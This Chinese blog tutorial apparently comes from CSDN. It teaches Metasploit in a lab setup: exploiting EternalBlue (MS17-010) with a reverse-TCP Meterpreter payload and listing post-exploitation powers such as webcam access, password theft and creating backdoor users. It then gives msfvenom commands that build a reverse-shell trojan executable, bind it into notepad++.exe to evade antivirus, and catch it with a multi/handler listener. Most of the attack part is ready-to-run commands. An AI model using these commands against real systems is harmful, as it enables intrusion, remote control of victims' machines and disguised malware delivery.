metasploit,msfvenom(生成木马后门)初步学习

本文介绍了Metasploit框架及其Meterpreter模块的使用,包括利用永恒之蓝漏洞、生成Windowsx64Meterpreter后门、捆绑木马以及实现免杀和加壳的技术。详细步骤展示了如何配置漏洞攻击、生成木马文件以及在目标机上操作。
摘要由CSDN通过智能技术生成

metasploit

  • metasploit
    • 介绍
    • 使用
    • meterpreter
  • msfvenom(生成木马后门)
    • 介绍
    • 使用
    • 免杀
      • 捆绑木马
      • 加壳


攻击机为kali,IP:192.168.23.129
靶机为windows7,IP:192.168.23.132
以永恒之蓝漏洞为例

metasploit

介绍

msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。(可以让复杂的漏洞攻击流程变的非常简单)

使用

  1. 在命令行输入msfconsole
    在这里插入图片描述

  2. 使用模块

    • 输入search 漏洞编号如:
      kali机中的运行
      以ms17_010(永恒之蓝)为例。
  3. 配置模块必选项。

    • 复制序号0对应的
    exploit/windows/smb/ms17_010_eternalblue
    
    show options  #拉出设置
    
    • (显示相关配置)required对应为yes的是必选项。在这里插入图片描述
      在这里插入图片描述

    • 逐个输入

       set RHOSTS IP靶机
       set Payload windows/x64/meterpreter/reverse_tcp
       set LHOST IP地址攻击机
      
      • RHOSTS为被攻击目标,LHOST为攻击的主机,ipconfig或者ifconfig查看IP是否正确,不对的改一下
      • Payload是攻击载荷,就是攻击完成后想干啥,这里是想获取meterpreter,payload包含在exploit里。这里payload已默认为windows/x64/meterpreter/reverse_tcp,可改可不改
      • 端口设置成没有被占用的。
      • 代码运行
        在这里插入图片描述
  4. 运行模块

    run
    

    如图在这里插入图片描述
    在run之后最后一行会出现meterpreter,表明此过程作用是获取meterpreter,如图。
    在这里插入图片描述

meterpreter

meterpreter是metasploit框架中的一个拓展模块,是一个强大的后渗透模块,可以输入help查看帮助信息
可以远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统等等
我们可以输入help查看我们可以进行的操作。
在这里插入图片描述
如查看靶机的网络摄像头情况,输入webcam_list,这里可以看到没有摄像头。
在这里插入图片描述

msfvenom(生成木马后门)

介绍

msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。(是在shell中使用)

使用

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -o demo.exe

在这里插入图片描述
lhost为主机ip,lport设置为没有被占用的端口号。
代码运行
在这里插入图片描述
这样木马文件就生成了
在这里插入图片描述

  • 开启对应端口(9999)
    msfconsole
    
    use exploit/multi/handler
    
  • 进行和上文差不多的设置
    show options
    
    在这里插入图片描述
    对应msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.129 lport=9999 -f exe -o demo.exe这一命令进行更改。
    set lhost 192.168.123.129
    set lport 9999
    set payload windows/x64/meterpreter/reverse_tcp
    
  • 最后
    run
    

在这里插入图片描述
这里run的成功运行需要靶机点击对应的木马文件

  • 然后输入help查看可以进行的操作如操控对方鼠标和摄像头。

免杀

捆绑木马

把木马文件与正常的文件(.exe)捆绑
如下列代码把木马文件与notepad-plus-plus.org/捆绑

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.23.129 lport=9999 -f exe -x notepad++.exe -o demo1.exe

加壳

压缩壳,加密壳

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值